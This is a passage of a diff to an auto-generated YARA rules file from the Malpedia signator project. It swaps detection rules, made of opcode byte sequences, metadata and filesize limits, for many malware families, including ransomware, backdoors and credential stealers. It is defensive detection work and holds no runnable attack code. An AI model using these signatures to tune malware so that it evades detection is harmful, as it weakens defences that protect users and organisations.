-		logic_hash = "08ba2b5584d7af06c3ea6ab9e9a7449efbced637b501a285d62a4734bce8c105"
+		logic_hash = "90260961ae1a599548c6d7cadbabe833b3a94be00dfdebc01e1cf8dc50ee7760"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108138,32 +108562,32 @@ rule MALPEDIA_Win_Anatova_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c89da 4c8b1d???????? 41ffd3 488b45d8 4989c3 }
-		$sequence_1 = { 4989c2 4c89d1 4c89da e8???????? 488b05???????? 4881c000020000 8b0d???????? }
-		$sequence_2 = { 0f8405000000 e9???????? 48b80000100000000000 e9???????? 488b45e8 48b90000000000000000 48894c2420 }
-		$sequence_3 = { 488985c0feffff 488b85c0feffff b938020000 8908 488b85c0feffff 4989c3 }
-		$sequence_4 = { e8???????? 0fb645ff 83f800 0f846f020000 }
-		$sequence_5 = { 8845fe 0fb645fe 83f800 0f840d010000 }
-		$sequence_6 = { 488b4d10 4801c1 8b45fc 4863c0 }
-		$sequence_7 = { 488b05???????? 4883f800 0f848f010000 488b05???????? 4883f800 0f847e010000 488b05???????? }
-		$sequence_8 = { b800000000 898574ffffff 8b8574ffffff 83f810 0f8dd3000000 }
-		$sequence_9 = { 48b80f00000000000000 4989c0 b800000000 4989c3 488d45b1 4989c2 4c89d1 }
+		$sequence_0 = { 8d442440 50 8d442418 50 8d442438 50 8d4c241c }
+		$sequence_1 = { 8d4dac e8???????? 8d4db0 c645fc2b e8???????? 8d45ec 50 }
+		$sequence_2 = { e8???????? 8d4c2410 51 50 8bcf e8???????? 8d4c2410 }
+		$sequence_3 = { 8d442424 57 50 e8???????? 8b8424bc020000 83c40c 8bc8 }
+		$sequence_4 = { e8???????? 6a01 68???????? 8d4c2430 e8???????? ff7004 ff30 }
+		$sequence_5 = { f00fc108 0f95c0 84c0 756e 8b44241c eb5b 837f1006 }
+		$sequence_6 = { 8b7c241c 8a4c2440 8b4360 8b5364 3b4368 7505 3b536c }
+		$sequence_7 = { 8b7c242c 8b4108 83c004 8d1481 89542418 8b410c 8d0c81 }
+		$sequence_8 = { c20800 6aff 6a00 68???????? 8d442440 b9???????? 50 }
+		$sequence_9 = { 8bf1 33db 57 c706???????? 395e50 7e2d 33ff }
 
 	condition:
-		7 of them and filesize < 671744
+		7 of them and filesize < 5892096
 }
-rule MALPEDIA_Win_Mpkbot_Auto : FILE
+rule MALPEDIA_Win_Fullmetal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5c0d844d-8443-5cd2-85d1-0760b4dc7471"
+		id = "b8b29202-9be6-50e1-9bec-3cebf32dec61"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mpkbot_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fullmetal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fullmetal_auto.yar#L1-L95"
 		license_url = "N/A"
-		logic_hash = "e000d2e2dca508ff7c1606218ef334f987cad7bd6633af2fef3bc1fd70b54752"
+		logic_hash = "c47370c8b8f3f3ccbb9778b64f7c7a952cf6e37e2cb16598ed18037ff7fcc6b0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108177,32 +108601,30 @@ rule MALPEDIA_Win_Mpkbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff15???????? ff7510 a3???????? }
-		$sequence_1 = { 68???????? 68???????? 8975f8 8b08 50 }
-		$sequence_2 = { 52 56 6a20 68???????? 68???????? 8975f8 8b08 }
-		$sequence_3 = { 50 ff15???????? 8b45fc 3bc6 7406 8b08 }
-		$sequence_4 = { 68???????? 68???????? 8975f8 8b08 50 ff5150 }
-		$sequence_5 = { a5 a5 8b75fc 5f 53 ff15???????? 8bc6 }
-		$sequence_6 = { 56 68???????? 68???????? ffd7 6a00 6a01 }
-		$sequence_7 = { eb15 53 ff75f8 56 }
-		$sequence_8 = { d95dd0 d945d0 d9c1 dee1 d95dcc 0fb630 }
-		$sequence_9 = { 6a01 6aff 8975fc 8b08 50 ff5110 85c0 }
+		$sequence_0 = { 90 8b4714 90 c1e80d }
+		$sequence_1 = { 488b05???????? 488d4de0 4d63c8 488bd3 4c8d8300010000 }
+		$sequence_2 = { e9???????? 488d1580960200 488bcb ff15???????? }
+		$sequence_3 = { 85c0 7918 488d542420 488d0dc0b60200 }
+		$sequence_4 = { 83e03f 4c8d3cc0 4a8b84e9404a0400 4a8b44f828 488945e7 458be1 }
+		$sequence_5 = { 85c0 7560 49ffc6 6646392c73 75f6 }
+		$sequence_6 = { eb20 bffdffffff 488b9424c8000000 488d0d2bc30200 4883c212 }
+		$sequence_7 = { 415e c3 8bc1 488d0df7990200 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 733184
 }
-rule MALPEDIA_Win_Fog_Auto : FILE
+rule MALPEDIA_Win_Kerrdown_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d28c9493-ded7-5c6b-96f1-79a637f3ec06"
+		id = "da236d92-1fe9-5457-946f-9d7f9613f9af"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fog"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fog_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kerrdown_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "65c8cd27a3044c0ed114d45adeda01dfdb815d1dce8b0ed05ceb7d08d13dca8c"
+		logic_hash = "2d8b506b753eb11d1ef360ccc2cec767f65cb094a11e4e8ce42bcebdfc177559"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108216,32 +108638,32 @@ rule MALPEDIA_Win_Fog_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a64 57 6a00 6800020000 e8???????? 0f1006 8b4514 }
-		$sequence_1 = { 50 8d45fc 50 8d45f0 50 ffd6 8b4510 }
-		$sequence_2 = { 8b8db8f6ffff 85c9 7445 8b3c8dd42b0110 85ff 0f8588000000 33c0 }
-		$sequence_3 = { 83c40c 6b45e430 8945e0 8d8028a10110 8945e4 803800 }
-		$sequence_4 = { 83c408 8bd8 8b4720 6a00 56 53 6a10 }
-		$sequence_5 = { 038c8300180000 0fb6c2 038c8300140000 0fb68308200000 038c8300100000 334cb338 314f38 }
-		$sequence_6 = { e8???????? 83c404 89861c020000 8b45e0 8d4e0c 6a06 8d901ca10110 }
-		$sequence_7 = { 0f8eac000000 660f1f440000 8d0c8500000000 83bc0d0cffffff02 0f857f000000 8db574ffffff 03f1 }
-		$sequence_8 = { 8b4604 03c3 50 ff36 e8???????? 8b4e04 }
-		$sequence_9 = { 0fb74004 6685c0 7527 ff4508 83c304 }
+		$sequence_0 = { 85f6 743f 83ff10 b8???????? 0f43c1 85f6 }
+		$sequence_1 = { 8d45f8 50 68004a0000 68???????? }
+		$sequence_2 = { 741b 56 68???????? 50 e8???????? }
+		$sequence_3 = { 75b2 83ff10 8935???????? b8???????? 0f43c1 5e }
+		$sequence_4 = { 5f 85c0 7543 50 6880000000 }
+		$sequence_5 = { 8bd3 2bd6 8a0e 8d7601 }
+		$sequence_6 = { 8935???????? b8???????? 0f43c1 5e }
+		$sequence_7 = { 884de5 02c2 33f6 8845e6 0fb64435e4 50 }
+		$sequence_8 = { b8???????? 0f43c1 03c2 3d???????? 762a ff750c 83ff10 }
+		$sequence_9 = { 80e203 c0e004 02d1 8855e4 8a55ea 8aca }
 
 	condition:
-		7 of them and filesize < 244736
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Vohuk_Auto : FILE
+rule MALPEDIA_Win_Boaxxe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fa7917d0-5d38-5842-a477-3065670570e2"
+		id = "5fdff2c4-9858-5230-8586-66650c6fe95c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vohuk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vohuk_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.boaxxe_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "1c7046d07a287745fd2dd564d0be780eb277cd73b0fb9a0541750f2b4df4fc07"
+		logic_hash = "124ce2238ea4b514d8960c521e2c44f0db9f5af3376e938bf1e4f0bfa769f279"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108255,32 +108677,32 @@ rule MALPEDIA_Win_Vohuk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745a441003500 b81f6b193a 8bce f7ee c1fa05 8bc2 c1e81f }
-		$sequence_1 = { c7403c9e008200 c7404083008300 c74044ce00c200 c74048ce00d100 c7404cbb00b700 c74050ce00d500 }
-		$sequence_2 = { e8???????? ff75ac 6a00 56 ffd0 8b7da0 e9???????? }
-		$sequence_3 = { c745ec00000000 50 ffd7 85c0 7474 8b0d???????? ba43c7bfd0 }
-		$sequence_4 = { 83f804 7646 6a14 81ff00010000 0f8618010000 51 }
-		$sequence_5 = { 7586 c745fc2f000000 8d9dd8feffff 8b5334 8d4004 8b33 8d5b04 }
-		$sequence_6 = { c645ff00 8b0d???????? ba05bc94bf 8b35???????? 6a15 e8???????? }
-		$sequence_7 = { 7307 bee8030000 eb0d 81fe10270000 7605 be10270000 8b0d???????? }
-		$sequence_8 = { ffd0 8bd8 bf41000000 b81a000000 8945fc f6c301 0f858a000000 }
-		$sequence_9 = { 51 6a38 8d8d60ffffff 51 6a0a 56 ffd0 }
+		$sequence_0 = { 8bc3 e8???????? 8d55d8 66b89a01 e8???????? ff75d8 68???????? }
+		$sequence_1 = { 8b542404 8bc7 e8???????? 8bce 03c9 8b442404 8d1458 }
+		$sequence_2 = { 85c0 7410 8bc3 8bd4 b905010000 e8???????? eb0d }
+		$sequence_3 = { 6a01 e8???????? 8bd8 bd80000008 85f6 740d 81ff00040000 }
+		$sequence_4 = { 64ff30 648920 8b55f0 a1???????? e8???????? 8b55f0 a1???????? }
+		$sequence_5 = { 8b4078 85c0 7420 8b54240c 8d0402 89442408 8bc6 }
+		$sequence_6 = { 8b5df8 03de 8a1b 8b7dfc 03f9 301f 46 }
+		$sequence_7 = { 7411 803c24ac 7507 807c240110 7404 33c0 5a }
+		$sequence_8 = { e8???????? 8d45d8 8b55ec e8???????? 8d45d8 8b4df4 8b55f8 }
+		$sequence_9 = { 83c9ff 32c0 f2ae f7d1 5f 92 f2ae }
 
 	condition:
-		7 of them and filesize < 260096
+		7 of them and filesize < 1146880
 }
-rule MALPEDIA_Win_Excalibur_Auto : FILE
+rule MALPEDIA_Win_Crypmic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6324643e-ef25-5303-a7ee-e63ea03ca117"
+		id = "a26f518b-f54e-5798-8fd7-c3e715fae74e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.excalibur_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crypmic_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "59d59e89202157c635015f906929dcafdfae271957da35e098ac970aa56a977d"
+		logic_hash = "c8a49a63b1990f5f0d77a9fcf41412b9f9f6710da574c5641db1ab5f7eadc95a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108294,32 +108716,32 @@ rule MALPEDIA_Win_Excalibur_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4d08 33c0 663b88e4954300 740d 83c002 83f814 72ef }
-		$sequence_1 = { eb44 8d0492 c1e003 50 8b450c 50 8b00 }
-		$sequence_2 = { ffd0 83c408 894734 85c0 74de 8b5f14 }
-		$sequence_3 = { 83793800 7503 83cf04 83e717 89790c 857910 7407 }
-		$sequence_4 = { 33c4 89442420 8b4508 8944240c 8b450c 53 8b5810 }
-		$sequence_5 = { 0f43c2 8d8d4cffffff 8a0430 8885f8feffff ffb5f8feffff 6a01 }
-		$sequence_6 = { 6685c0 75f5 56 8d85d8f9ffff 2bd9 }
-		$sequence_7 = { 48 894604 8b06 40 8a48ff 8906 84c9 }
-		$sequence_8 = { 8945bc 8b45c8 8955e4 8b4020 c745e800000000 }
-		$sequence_9 = { 8d4c245c e8???????? 84c0 7433 68???????? 8d8c2490000000 e8???????? }
+		$sequence_0 = { 55 8bec 83ec10 837d0800 8bc2 894df8 0f868c000000 }
+		$sequence_1 = { 740a 8d4002 46 66833800 75f6 8d3c72 33c0 }
+		$sequence_2 = { 8d3409 33db 0fb7143e 663bda }
+		$sequence_3 = { 66833800 75f6 8d3c72 33c0 }
+		$sequence_4 = { 0fb78c15c0fdffff 663bf1 75e8 8b75f4 }
+		$sequence_5 = { 8b4e08 53 6a08 ff7604 }
+		$sequence_6 = { 8bec 81ec70020000 8b4108 53 56 }
+		$sequence_7 = { 56 57 894df4 83f828 7252 83e828 }
+		$sequence_8 = { 50 8b4608 6a08 ff7604 ffd0 8bf8 c70728000000 }
+		$sequence_9 = { bb04000000 eb27 83f808 7707 }
 
 	condition:
-		7 of them and filesize < 1253376
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Pykspa_Auto : FILE
+rule MALPEDIA_Win_Zeus_Action_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "50716d19-baac-512e-9696-08ac9e2a4a98"
+		id = "b1bc7ed7-2f41-59f6-b8c0-74ccb733a5b2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pykspa_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeus_action_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "224d3991c62a8b8f8f63073971c195da5bc5aec2fb8743f9bc32c0631a402ab6"
+		logic_hash = "e0a4177bac84ef56b9551fcc42fe4ba9ebe72ed006b608f1d2911d9c311b37c6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108333,32 +108755,32 @@ rule MALPEDIA_Win_Pykspa_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 32c0 eb0d 2b4508 8d443004 39450c 0f9dc0 }
-		$sequence_1 = { ff7524 68???????? e8???????? 83c40c 8d8500fcffff 50 8d8500d4ffff }
-		$sequence_2 = { 53 ff15???????? e9???????? 8d85a0feffff 68???????? 50 e8???????? }
-		$sequence_3 = { 8bf0 ff15???????? ff75cc 8bf8 e8???????? 3bf3 59 }
-		$sequence_4 = { e9???????? 6a0a 8d45b0 50 8d858ceeffff 50 e8???????? }
-		$sequence_5 = { 8bcb 83e107 c1e102 d3e8 a80f 7503 4b }
-		$sequence_6 = { 50 6aff ff36 53 53 ff15???????? ff7508 }
-		$sequence_7 = { 6a41 8d45bc 50 68???????? e8???????? 83c40c ff15???????? }
-		$sequence_8 = { 53 e8???????? 8903 8d0436 83c40c 894708 6a02 }
-		$sequence_9 = { 7414 8d4580 50 8d4508 50 56 ff7510 }
+		$sequence_0 = { 53 ff15???????? 89866c070000 85c0 0f849c010000 ff15???????? }
+		$sequence_1 = { 59 ebb1 8365fc00 8d45fc 50 56 e8???????? }
+		$sequence_2 = { 50 ffd6 8b4304 83c40c 83400403 e9???????? 8d4df8 }
+		$sequence_3 = { c3 55 8bec 33d2 837d1008 53 8ada }
+		$sequence_4 = { ff15???????? 89442420 0fb705???????? 50 ff15???????? 668944241e 6a10 }
+		$sequence_5 = { 75e6 8b55e8 8b7508 8b7d0c 8b4510 eb05 }
+		$sequence_6 = { 8b3f 8b4f0c 8b5f08 894dfc 8b45f8 3b7df4 0f85ebfeffff }
+		$sequence_7 = { 3bc1 7e04 33c0 eb37 8b4d18 0fb73b 8b11 }
+		$sequence_8 = { eb76 80f96e 7523 8b4304 8b4804 8b5008 2bd1 }
+		$sequence_9 = { 8945e4 85c0 0f849f010000 8b4508 8bf8 c1ef06 a83f }
 
 	condition:
-		7 of them and filesize < 835584
+		7 of them and filesize < 827392
 }
-rule MALPEDIA_Win_Microbackdoor_Auto : FILE
+rule MALPEDIA_Win_Nemty_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d034a3c6-ae16-5b99-83b8-8b1af34e1631"
+		id = "cdf39d25-7035-553c-816d-fe9d35a19962"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.microbackdoor_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nemty_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "aab22f804c7581af6f351afbab65356d1b51594dabf7c74f24bb9a35b014fbaa"
+		logic_hash = "3672eaf2e9c4783f20e7f6ec877d618670612c5d8376e42a0d5a0e87ba0dbd7a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108372,38 +108794,32 @@ rule MALPEDIA_Win_Microbackdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c9 8d45f0 50 51 6a3a }
-		$sequence_1 = { ffd7 eb06 ff15???????? 8bc6 eb06 }
-		$sequence_2 = { eb42 0fb6442431 3c5a 7520 837c243400 7419 66837c243200 }
-		$sequence_3 = { 488dac2410feffff 4881ecf0020000 8bd9 33c9 440fb7ea e8???????? }
-		$sequence_4 = { 418bce 0fb7de ff15???????? 488d15ea390000 488d4c2450 4c8bc0 }
-		$sequence_5 = { 66896c2420 ff15???????? 8bce 89742424 }
-		$sequence_6 = { 59 56 ff15???????? eb06 ff15???????? 8b75f4 }
-		$sequence_7 = { ff15???????? 488d0d01290000 eb68 488d542430 41b800010000 488bcb e8???????? }
-		$sequence_8 = { 7412 488d0dfa700000 448bc0 488bd6 e8???????? 03df }
-		$sequence_9 = { ff15???????? 85c0 0f8599feffff 8d4508 33db 50 }
-		$sequence_10 = { eb57 4d03c9 498bd7 498bce 43ff54cd08 }
-		$sequence_11 = { 448bc6 488bd0 488bcf e8???????? 8bf8 85c0 }
-		$sequence_12 = { 3bfe 7cdd 33c0 40 }
-		$sequence_13 = { 895d08 e8???????? 83c410 85c0 7467 }
-		$sequence_14 = { ff15???????? ff75fc ff15???????? ff7508 ff15???????? eb0e ff15???????? }
-		$sequence_15 = { 8975fc 50 56 56 6a19 ff75f8 ff15???????? }
+		$sequence_0 = { 6bf61c 8b45e8 03f0 897308 6bff1c }
+		$sequence_1 = { e8???????? 53 8d75e0 e8???????? 8b4dfc 5f 5e }
+		$sequence_2 = { e8???????? 6a01 33ff 8d7508 e8???????? 8b4dfc }
+		$sequence_3 = { 83c61c 3bd8 72c0 68???????? }
+		$sequence_4 = { ff15???????? 53 8d459c 50 ff35???????? }
+		$sequence_5 = { e8???????? 33db 43 53 33ff 8d75e0 e8???????? }
+		$sequence_6 = { c20400 8b4f04 53 8bd8 56 }
+		$sequence_7 = { 5f f7ff 43 83c61c 3bd8 72c0 }
+		$sequence_8 = { 837d3810 8bf8 8b4524 59 7303 8d4524 837d3810 }
+		$sequence_9 = { 50 56 6806000200 6a01 56 56 68???????? }
 
 	condition:
-		7 of them and filesize < 123904
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Httpbrowser_Auto : FILE
+rule MALPEDIA_Win_Keymarble_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ae4ee866-262a-554a-b946-19e1882a583d"
+		id = "447d0650-610a-5703-8049-ac11f5ff96b2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.httpbrowser_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.keymarble_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "fe5c658a5d4b7829560ab47b5951aa60c2bf887992bf53e66e96f138e4aa0991"
+		logic_hash = "e486a69a145cdf890bda9b04db818a44b92722887c60b9c58647de19116cd1c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108417,38 +108833,32 @@ rule MALPEDIA_Win_Httpbrowser_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 751d 68???????? ffb5f0fdffff ff15???????? ffb5f0fdffff ff15???????? 56 }
-		$sequence_1 = { 6800010000 8d85f8feffff 50 ff15???????? 8d85f8feffff }
-		$sequence_2 = { 8bec 81ecac020000 a1???????? 33c5 8945fc 57 8d8558fdffff }
-		$sequence_3 = { eb3c 8b85e4fdffff 8985f4fdffff 3bc6 74ec 53 }
-		$sequence_4 = { 33db 56 8985e8eeffff 8d85fdeeffff 53 50 8bf9 }
-		$sequence_5 = { 6a04 8d85a0feffff 50 6a13 }
-		$sequence_6 = { ffd6 83bd6453ffff14 7552 8d85c855ffff 50 }
-		$sequence_7 = { 8d85fefdffff 50 e8???????? ffb5f4edffff }
-		$sequence_8 = { 8b7508 8d4dec 6a00 8d55fc 51 }
-		$sequence_9 = { 33c0 8dbdb2fcffff 668995b0fcffff f3ab }
-		$sequence_10 = { 56 e8???????? 8bf8 83c408 85ff 7422 66891f }
-		$sequence_11 = { 5d 9d 5d 8b4dfc 51 }
-		$sequence_12 = { 50 8b4508 51 50 52 }
-		$sequence_13 = { e8???????? 83c410 8b4d08 6a00 68???????? }
-		$sequence_14 = { ff15???????? b940000000 33c0 8dbdfcfeffff }
-		$sequence_15 = { 8d741202 56 e8???????? 8bd0 83c404 85d2 8955f8 }
+		$sequence_0 = { ff15???????? 50 e8???????? 83c404 56 6a40 }
+		$sequence_1 = { 6a00 6a03 6800000040 57 ffd6 }
+		$sequence_2 = { ff15???????? e8???????? 99 b907000000 f7f9 }
+		$sequence_3 = { e8???????? 83c408 85c0 7407 bb7a452301 }
+		$sequence_4 = { ffd7 50 e8???????? 83c404 e8???????? 8d3470 81e6ffffff7f }
+		$sequence_5 = { e9???????? 50 6a00 6810040000 }
+		$sequence_6 = { 85db 7407 53 ff15???????? ff15???????? }
+		$sequence_7 = { e9???????? 50 6a00 6810040000 ff15???????? }
+		$sequence_8 = { ff15???????? 85db 7407 53 ff15???????? ff15???????? }
+		$sequence_9 = { 50 e8???????? 83c404 e8???????? 8d3470 81e6ffffff7f }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 1146880
 }
-rule MALPEDIA_Win_Troll_Stealer_Auto : FILE
+rule MALPEDIA_Win_Gemcutter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "40759ced-a25e-5434-bc7c-501cfe15d47a"
+		id = "f2a59f86-1075-5464-b91b-cb447c183566"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.troll_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.troll_stealer_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gemcutter_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "5f0403028aceb1e51ecaa890b1a7ca49efec2e1c71ccfd760d9d2619abef354a"
+		logic_hash = "9745c8061ab88116351043d55251d3e8c32737ca442027c8a6620480abc8c8bf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108462,32 +108872,32 @@ rule MALPEDIA_Win_Troll_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 49895008 6699 49894010 0fb7d5 9c c0f2b0 66d3f2 }
-		$sequence_1 = { d0ca 80c2f3 f9 f8 d0c2 4432ca f7c465491a38 }
-		$sequence_2 = { f7d2 f9 d1c2 4153 41ffc3 311424 415b }
-		$sequence_3 = { 4181eb2315e85c 313424 458bdd 49c7c33109c930 }
-		$sequence_4 = { 81d9d83d744a f6d2 80c253 0fbfc8 d2cd d0c2 }
-		$sequence_5 = { 313c24 480fbafbc6 c1eb14 480fb7da 5b 4863ff f8 }
-		$sequence_6 = { 453bf3 4153 311424 664181eb996f 415b f9 4863d2 }
-		$sequence_7 = { 4d8d141a 48bd0000000002000000 4d8d142a 410fc1f9 4c8bc4 4881ec80010000 450fbfc8 }
-		$sequence_8 = { 403ad4 81f6a540bf26 f7d6 f5 d1c6 f8 f7d6 }
-		$sequence_9 = { 4112eb 418910 4080dd61 40fec5 660bef 418b2b 4981c304000000 }
+		$sequence_0 = { fec8 8886a0314000 8a843579ffffff 46 ebea 395d08 889ea0314000 }
+		$sequence_1 = { 8d85f0fcffff 53 50 ffd6 8d85f0fcffff }
+		$sequence_2 = { 68???????? e8???????? 83c424 8b3d???????? 56 }
+		$sequence_3 = { 6a01 ff15???????? 6a01 68???????? e8???????? 6a01 }
+		$sequence_4 = { e8???????? 83c424 8b3d???????? 56 33f6 }
+		$sequence_5 = { 83c410 8d85f0fdffff 53 50 ffd6 8b3d???????? 8d85f0fdffff }
+		$sequence_6 = { 57 53 6801001f00 ff15???????? 3bc3 be???????? }
+		$sequence_7 = { 56 ff15???????? 8bf8 8d8500fcffff }
+		$sequence_8 = { fec8 8886a0314000 8a843579ffffff 46 ebea 395d08 }
+		$sequence_9 = { 6a00 6801001f00 ff15???????? 85c0 7517 68e8030000 ff15???????? }
 
 	condition:
-		7 of them and filesize < 45868032
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Nightdoor_Auto : FILE
+rule MALPEDIA_Win_Phoenix_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d8e136f5-ecc5-5fee-8886-ee91c9e305f7"
+		id = "32012f66-221c-5fa5-9d14-f943abc9c522"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nightdoor_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phoenix_locker_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "d66f399d7d6cc21f703af3dc1753edb59e4b1b5c61847dda1732e7b96de70f40"
+		logic_hash = "c929252a8fed8f1bda435d368708b210ebe5b5f043e324b3e033e447747795e0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108501,32 +108911,32 @@ rule MALPEDIA_Win_Nightdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 ff15???????? 8b45fc 8b08 51 e8???????? 83c404 }
-		$sequence_1 = { 51 8d4dac e8???????? c7458800000000 eb09 8b5588 }
-		$sequence_2 = { 0f840c020000 6a00 8d4dc0 51 8d55c8 52 }
